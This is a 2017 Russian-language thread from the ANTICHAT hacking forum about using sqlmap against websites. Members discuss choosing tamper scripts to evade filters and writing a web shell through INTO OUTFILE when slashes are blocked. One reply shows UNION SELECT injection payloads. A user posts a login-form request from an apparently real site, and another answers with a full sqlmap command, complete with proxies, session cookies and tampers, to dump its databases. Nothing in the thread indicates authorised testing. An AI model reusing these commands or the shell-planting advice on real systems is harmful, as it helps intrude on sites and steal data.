ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.06.2017, 17:03
|
|
Новичок
Регистрация: 20.02.2016
Сообщений: 10
Провел на форуме:
2307
Репутация:
0
|
|
Буду признателен, если кто то нормально объяснить как правильно подбирать тамперы. Или ссылку на понятный мануал по этой теме
|
|
|
20.06.2017, 01:41
|
|
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
Провел на форуме:
60408
Репутация:
0
|
|
|
|
|
|
26.06.2017, 21:18
|
|
Новичок
Регистрация: 28.03.2014
Сообщений: 21
Провел на форуме:
7519
Репутация:
0
|
|
Есть скуля, но она в одном фреймворке, который триггерует на слэш " / " , (фреймворк, потому как на другом сайте такая же ситуация). Я в курсе, что слэш никак не мешает доставать полезную информацию, это сделано, но есть теоретическая возможность залития шелла (file priv Y, пути есть),а скулмап его не в состоянии залить, указывать пути не могу по причине того, что не работает слеш ( INTO OUTFILE "путь/до/шелла" ).
Что посоветуете ?
|
|
|
|
29.06.2017, 11:20
|
|
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
Провел на форуме:
60408
Репутация:
0
|
|
Сообщение от danil911
↑
Есть скуля, но она в одном фреймворке, который триггерует на слэш " / " , (фреймворк, потому как на другом сайте такая же ситуация). Я в курсе, что слэш никак не мешает доставать полезную информацию, это сделано, но есть теоретическая возможность залития шелла (file priv Y, пути есть),а скулмап его не в состоянии залить, указывать пути не могу по причине того, что не работает слеш ( INTO OUTFILE "путь/до/шелла" ).
Что посоветуете ?
char encode
|
|
|
|
01.07.2017, 09:47
|
|
Новичок
Регистрация: 20.12.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Поставить sqlmap, скорость упала, как сохранить данные которые уже скачались из базы? Если просто окно закрыть, вроде как данные все пропадут...
|
|
|
|
01.07.2017, 13:07
|
|
Новичок
Регистрация: 01.07.2017
Сообщений: 7
Провел на форуме:
2595
Репутация:
0
|
|
as my self SQLmap better than havij.
|
|
|
|
10.07.2017, 19:39
|
|
Новичок
Регистрация: 30.10.2008
Сообщений: 12
Провел на форуме:
24552
Репутация:
17
|
|
Сообщение от Vald
↑
Подскажите, что делает параметр --no-cast? По мануалу не могу понять.
- приведение типов.
sqlmapпо умолчанию использует приведение типов данных к строковым значениям для удобного отображения результата в консоли.
Но не всегда этот механизм необходим, в некоторых случаях данные не будут корректно приведены к строковому типу.
Для наглядности работы механизма можно рассмотреть запросы к MySQL, которые генерирует sqlmap:
a) без параметра --no-cast
Сообщение от None
1' UNION SELECT CONCAT(0x3a,
IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)
,0x3a)
б) с параметром --no-cast
Сообщение от None
1' UNION SELECT CONCAT(0x3a,
CURRENT_USER()
,0x3a)
|
|
|
|
11.07.2017, 10:05
|
|
Новичок
Регистрация: 02.07.2017
Сообщений: 3
Провел на форуме:
1083
Репутация:
0
|
|
Не получается раскрутить уязвимость(это же уязвимость?)
Ошибка: https://s8.hostingkartinok.com/uploa...115e042fec.png
POST такой:
.SpoilerTarget" type="button">Spoiler
Заголовки:
Код:
Host: site.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: site.ru/page
Cookie: __cfduid=d6db872199804f625c490305153453b1b1499733704; PHPSESSID=0881abe8mvn1a6uov3sod7mps6; language=ru; currency=RUB; gameboxmp2.net=true; viewed=423
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Тело:
Код:
Content-Type: multipart/form-data; boundary=---------------------------29948882417335
Content-Length: 249
-----------------------------29948882417335
Content-Disposition: form-data; name="email"
'
-----------------------------29948882417335
Content-Disposition: form-data; name="password"
00000000
-----------------------------29948882417335--
Пытаюсь вот так, я наверное неправильно --data оформляю
Код:
sqlmap.py -u "site.ru/page" --proxy-file="proxy.txt" --random-agent --time-sec=10 --delay=1 --tamper="between,randomcase,space2comment" --dbms=mysql --level=5 --risk=1 -v3 --data="???"
|
|
|
|
11.07.2017, 13:46
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от SadBlackFox
↑
Не получается раскрутить уязвимость(это же уязвимость?)
-u "site.ru/page" --proxy-file="proxy.txt" --random-agent --tamper="between,randomcase,space2comment" --cookie="__cfduid=d6db872199804f625c490305153453b1b 1499733704; PHPSESSID=0881abe8mvn1a6uov3sod7mps6; language=ru; currency=RUB; gameboxmp2.net=true; viewed=423" -v 3 --data "password=123&email=123" -p email --dbs
|
|
|
|
12.07.2017, 23:38
|
|
Новичок
Регистрация: 02.07.2017
Сообщений: 3
Провел на форуме:
1083
Репутация:
0
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
